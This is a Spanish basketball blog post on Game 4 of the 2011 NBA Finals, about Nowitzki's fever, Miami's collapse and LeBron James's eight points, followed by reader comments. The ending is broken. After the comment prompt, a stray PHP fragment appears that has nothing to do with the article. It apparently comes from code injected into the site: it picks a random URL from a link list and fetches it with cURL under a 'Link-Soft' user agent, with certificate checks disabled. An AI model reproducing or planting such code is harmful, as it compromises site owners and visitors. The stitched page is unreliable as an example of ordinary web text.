La Gran Final (07/06/2011): Fiebre de finales

08 de June de 2011 por TheDeerHunter

“No mandé a mis naves a luchar contra los elementos”… pero anoche Dirk Nowitzki demostró que no serán los elementos externos los que le detengan en la situación más crítica posible. Como ya lo hiciera Michael Jordan en el 5º choque de la final de 1997 anoche “Robin Hood” saltó a la pista con 38 de fiebre. Este pequeño detalle no evitó que liderara a los suyos para igualar la final a 2 victorias. Sobrehumano.

Una vez más en esta serie, los Heat afrontaron el último cuarto con ventaja y una vez más terminaron claudicando ante el arreón postrero de Dallas. Esto ya les ha costado dos partidos que tuvieron en la mano y puede costarles aún más caro. La fiebre la sintió el público local, cuando a falta de 19 segundos con sólo 1 arriba un Dirk mermado rompía a Haslem culminando el 21-9 final y le devolvía la del último partido. Hace falta algo más que buenos defensores para frenar a una leyenda y no todos los días son domingo.

La épica de la fiebre da otra dimensión a un partido bastante feo e impreciso. Con un 6 de 34 en triples entre ambos las latas permanecieron cerradas a fuego. El encuentro volvió a resolverse por un colapso ofensivo infame por parte de Miami que falló  prácticamente todos sus lanzamientos desde más allá de 4 metros durante los últimos 10 minutos. Si Dallas frena las penetraciones tiene mucho ganado porque el tiro exterior de Miami es, en el mejor de los casos, irregular. Los 30 tiros libres que lanzaron los locales es lo que realmente marca la mínima diferencia que resolvió el partido.

Como decíamos el de ayer no será recordado como un gran partido. Sin quitarle un ápice de mérito, Dirk Nowitzki, con poco más de un 30% de acierto, no pudo brillar como lo hizo “Su Majestad” en su día. Jason Terry, muy fallón al principio, contribuyó a la remontada sólo en la cresta de la ola. Jason Kidd estuvo muy oscuro… Pero lo que nadie podía esperar es que LeBron James firmara únicamente 8 puntos en una serie de tiro verdaderamente horrible. Eso necesariamente lo tiene que notar Miami.

Anoche sí se cumplió la máxima de que Dallas tiene mayor fondo. Frente al partidazo de Dwyane Wade, ayudado únicamente por Chris Bosh, Carlisle pudo oponer la producción de hasta 6 hombres. Le salió bien la jugada con la inclusión de Barea de inicio y Stevenson pareció agradecerlo con un buen partido desde el banco. Excelente rendimiento también de Chandler y Marion. La leyenda del alemán borrará en la historia el vital trabajo que realizaron.

PREMIOS

MVP: En el cómputo global no fue un grandísimo partido de Dirk Nowitzki pero su actuación en el último cuarto (10 puntos y 5 rebotes) volvió a ser decisiva. Y aún tiene más mérito tras descubrir que jugó con 38 de fiebre debido a una sinusitis. También hemos de destacar a Tyson Chandler, autor de 13 puntos y 16 rebotes.

Sorpresa: Mario Chalmers se está conviertiendo en el factor X de los Heat. Anoche solo anotó 5 puntos, pero capturó 4 rebotes, repatrió 6 asistencias y robó un par de balones. ¿Para qué ficharon a Bibby?

Decepción: Una para cada equipos. Por los tejanos, los 0 puntos de Jason Kidd en 39 minutos de juego. Por los de Florida, los 0 puntos de Lebron James en el último cuarto. En total sólo anotó 8, su peor marca en un partido de playoffs. A Mike Bibby también le podemos dar de comer aparte.

Esfuerzo en vano: Ante la desaparición de Lebron James en el aspecto anotador, Dwyane Wade cogió la batuta con 32 insuficientes puntos. La balanza empieza a inclinarse muy ostensiblemente hacia el ex de Marquette.

Imágenes | AP Photos / Getty Images

Comenta

10 comentarios a esta entrada

  1. ralage dice:
    #1

    Me gustó mucho que Dallas fuese capaz de poner fin al déficit de rebotes que tuvo en la 1ª parte, hay que reconocer que le ponen ganas, y tienen fe, solo esperemos que les dure la gasolina…

    En cuanto a LeBron, me esta gustando como lleva el tema de “no ir a por el mvp de las finales”, y creo que debería seguir así, que ayer hizó un 3-11, pues una mala noche, pero para eso se cambió de equipo, no?
    por que con los Cavs, ayer perderían de 20

      Citar

  2. Cocinitas dice:
    #2

    Madre mia como estan las finales!!! Me parece que se van a decidir en el séptimo como el año pasado. Lo de Dirk es increible, un crack, imparable se merece este anillo creo que es su año para confirmarse como el mejor jugador no americano que ha pisado la liga.

      Citar

  3. jas dice:
    #3

    Pues yo creo que lebron no lo hace a propósito, simplente se esta arrugando un poco ante las circunstancias, no como wade que esta dando la cara en todo momento, xo weno que no dudo q volvera a aparecer y hara unas grandes finales, al king lo q es del king.

      Citar

  4. GreenPride dice:
    #4

    Los Mavs volvieron a escapar del hollo. Si en el segundo partido ya remontaron en el último cuarto para no quedar 2-0 ayer volvieron a evitar un casi imposible 3-1 remontando en el último cuarto 9 puntos de diferencia.
    El partido fue muy intenso y emocionante aunque bastante pobre en líneas generales excepto por parte de un jugador. Wade hizo un partidazo que casi lleva de nuevo a los suyos a la victoria pero volvamos al principio.
    En la primera parte los Heat estaban negados cara al aro pero los rebotes de ataque les mantuvieron cerca hasta que empezaron a entonarse y se colocaron por delante.
    En Dallas, Carlisle hizo 2 movimientos para ver si recuperaba la iniciativa del juego. Quitó a Stojakovic de la rotación y pasó a Barea de titular con Stevenson en la reserva. Esto último le dió bastante efecto ya que Dallas salió enchufado y Stevenson hizo muy buen partido desde el banco con triples y defensa.
    En la segunda se vió algo que parecía que debía ser clave para Dallas. Parada la sangría bajo los aros por fin su segunda unidad fue mucho mejor que la de Miami. Partidazos de Marion y sobre todo Chandler y un decisivo Terry para echarle una mano a un cansadísimo Nowitzki en el final del partido. Y Robin Hood, pues qué decir de él. Esta dispuesto a luchar hasta el final, a muerte por la que puede ser su última ocasión de anillo. Ayer con fiebre volvió a jugar un último cuarto espectacular, reconociendo que de lejos estaba demasiado cansado y no le entraban fue a buscar el aro y consiguió tiros libres y bandejas decisivas sobre todo la última sobre Haslem.
    En los Heat quitando el partidazo de Wade hay que hacerse una pregunta. ¿Que pasa con LeBron? Antes del partido se le veía en el corro decirle a sus compañeros que había que jugar como si fuese un partido que fuese obligatorio ganar. Se ve que eso no le incluía a él. Nada agresivo hacia el aro, con muy pocos lanzamientos, fallando mucho y dejando toda la responsabilidad a Wade. Sé que si chupa decimos que hay que ver, pero no se puede tolerar que el posiblemente mejor jugador del partido no haga nada por producir en ataque y ayudar a Wade sobre todo en los momentos en los que el ataque de Miami se atascó en el último cuarto cuando Bosh desapareció tras una buena primera parte. La segunda unidad cumplió, con gran partido de Chalmers pero esta vez sí fue superada por la de Dallas y el ataque Heat estuvo fatal desde fuera de la zona.
    Finales empatadas y gran 5º partido el que nos espera mañana. Yo sigo diciendo que tras el 3º los Heat son claros favoritos y pienso que ganarán las series casi seguro aunque no me importaría nada equivocarme… el gran Robin Hood se lo merece

      Citar

  5. Denise dice:
    #5

    Desde que dije que Lebron sería el MVP, lo he gafado.
    Nowitzki se merece ser el MVP, aunque Dallas perdiese la final. Obviamente por marketing, eso no sucedería jamás, pero se lo merece más que los otros dos Beach Boys.

      Citar

  6. ralage dice:
    #6

    +1 Denise

      Citar

  7. Blade Petrovic dice:
    #7

    Vuelvo repetir que en estos playoffs una de las claves es que los equipos dejan escapar grandes ventajas de mas de 12 puntos y el que remonta tiene las de gaar en la eliminatoria, sino que se lo digan a Rose.
    Estoy contigo Denise

      Citar

  8. Tobal dice:
    #8

    Pues señores,esta final se está poniendo bastante emocionante,Dallas vuelve a meterse de nuevo,tras su triunfo de ayer,estuvieron muy intensos en el último cuarto,yo soy optimista y creo que si los Mavericks,ganan el quinto partido,pueden ganar el anillo,aunque sería complicado jugársela en Miami,pero ya han demostrado,que no dan un partido por perdido.

      Citar

  9. Sempren dice:
    #9

    Ya sabemos quien prefieres que gane, eh Denise. Sabes que gafaste a Lebron por hablar del MVP, y ahora lo haces con Dirk también…
    xD

      Citar

  10. Denise dice:
    #10

    jajja No, No, realmente me da igual quien gane, y lo de Dirk lo dije totalmente en serio.
    Creo que va a ganar Miami 4-2. Nowitzki está a un nivel sobrehumano, pero el Big 3 es mucho Big 3.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>